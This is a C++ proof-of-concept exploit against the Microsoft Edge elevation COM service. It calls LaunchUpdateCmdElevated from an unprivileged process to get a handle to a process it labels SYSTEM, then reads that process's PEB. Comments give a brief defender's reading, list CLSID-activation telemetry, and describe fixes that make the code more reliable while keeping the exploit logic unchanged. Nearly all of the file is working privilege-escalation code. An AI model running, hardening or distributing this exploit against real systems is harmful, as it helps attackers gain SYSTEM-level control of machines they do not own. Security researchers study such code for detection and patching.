#pragma once
#include <windows.h>
#include <wrl.h>
#include <comdef.h>
#include <winternl.h>
#pragma comment(lib, "ntdll.lib")
using namespace Microsoft::WRL;
// Hand-declared COM interface for the Edge elevation service; no IDL or type library
// is on the page, so this declaration is the only contract the client has.
// The uuid attribute is what IID_PPV_ARGS picks up in main(). C++ builds the vtable in
// declaration order (after the three IUnknown slots), so the order and count of the
// methods below must match the server's real interface exactly or calls land on the
// wrong slot.
class __declspec(uuid("c9c2b807-7731-4f34-81b7-44ff7779522b")) IElevatorEdge : public IUnknown
{
public:
// Not called by main(). Parameter meanings are read off the names only —
// NOTE(review): not verified against the service's own definition.
virtual HRESULT __stdcall RunRecoveryCRXElevated(WCHAR* crx_path,
WCHAR* browser_appid,
WCHAR* browser_version,
WCHAR* session_id,
DWORD caller_proc_id,
ULONG_PTR* proc_handle);
// Called by main() with an app-id GUID string, a command id, the caller's own PID and
// an out-parameter that receives a process handle. Presumably caller_proc_id tells the
// service which process the handle is duplicated into — TODO confirm; the PoC never
// validates that the returned handle is non-null before using it.
virtual HRESULT __stdcall LaunchUpdateCmdElevated(WCHAR* browser_appid,
WCHAR* cmd_id,
UINT caller_proc_id,
PHANDLE proc_handle);
};
// Turns a failed HRESULT into a _com_error exception so COM calls can be
// wrapped inline; success codes (including S_FALSE) pass through unchanged.
static HRESULT Check(HRESULT hr)
{
    if (SUCCEEDED(hr))
        return hr;
    throw _com_error(hr, nullptr);
}
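// Proof-of-concept driver: activates the Edge elevation service over COM, asks it to
// launch an update command on the caller's behalf and inspects the process handle that
// comes back (the original PoC labels that process as SYSTEM in its output).
// Defender's reading: the security-relevant boundary is that a caller-chosen PID and a
// handle out-parameter are accepted by LaunchUpdateCmdElevated from an unprivileged
// client; the interesting telemetry is therefore CLSID {1FCBE96C-...} activations from
// processes that are not the browser/updater themselves (hedged — verify with the
// service's own activation logs).
//
// Fixes relative to the original listing (exploit logic unchanged):
//   - CLSIDFromString / CoSetProxyBlanket results were ignored; now routed through Check.
//   - proc_handle was used uninitialised and without checking hr; now checked first.
//   - "%x" for a HANDLE and "%d" for a ULONG_PTR were size-wrong on x64; now %p / %zu.
//   - unused hToken / appid / strAppID removed; handle and COM are released on exit.
int main() {
    // COM must be initialised before any CLSID or activation call; Check throws on failure.
    Check(CoInitializeEx(nullptr, COINIT_MULTITHREADED));

    CLSID cls_edgesvc = {};
    Check(CLSIDFromString(L"{1FCBE96C-1697-43AF-9140-2897C7C69767}", &cls_edgesvc));

    // Out-of-process activation: the service runs in its own (elevated) process.
    ComPtr<IElevatorEdge> iEleEdge;
    Check(CoCreateInstance(cls_edgesvc, NULL, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&iEleEdge)));

    // Same blanket as the original PoC; its result was silently dropped before.
    Check(CoSetProxyBlanket(iEleEdge.Get(), RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_NONE, COLE_DEFAULT_PRINCIPAL, RPC_C_AUTHN_LEVEL_CONNECT, RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, EOAC_DEFAULT));

    // The PoC hands the service its own PID. proc_handle is an out-parameter: it is only
    // meaningful when the call succeeded and the service actually filled it in.
    const DWORD dwClientPID = GetCurrentProcessId();
    HANDLE proc_handle = nullptr;
    const HRESULT hr = iEleEdge->LaunchUpdateCmdElevated(L"{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}", L"on-os-upgrade", dwClientPID, &proc_handle);
    if (FAILED(hr) || proc_handle == nullptr) {
        printf("LaunchUpdateCmdElevated failed: 0x%08lx\n", static_cast<unsigned long>(hr));
        CoUninitialize();
        return 1;
    }
    // HANDLE is pointer-sized; the original "%x" truncated it on 64-bit builds.
    printf("handle: 0x%p\n", proc_handle);

    PROCESS_BASIC_INFORMATION pbi = {};
    ULONG retLength = 0;
    const NTSTATUS status = NtQueryInformationProcess(proc_handle, ProcessBasicInformation, &pbi, sizeof(pbi), &retLength);
    if (status < 0) {
        // NTSTATUS failure codes have the sign bit set; pbi is not valid in that case.
        printf("NtQueryInformationProcess failed: 0x%08lx\n", static_cast<unsigned long>(status));
    } else {
        // UniqueProcessId is ULONG_PTR, so "%d" was size-wrong on x64.
        printf("%zu SYSTEM PROCESS PEB AT: 0x%p\n", static_cast<size_t>(pbi.UniqueProcessId), static_cast<void*>(pbi.PebBaseAddress));
    }
    getchar();

    // Release what we own before tearing COM down (ComPtr releases the proxy itself).
    CloseHandle(proc_handle);
    CoUninitialize();
    return 0;
}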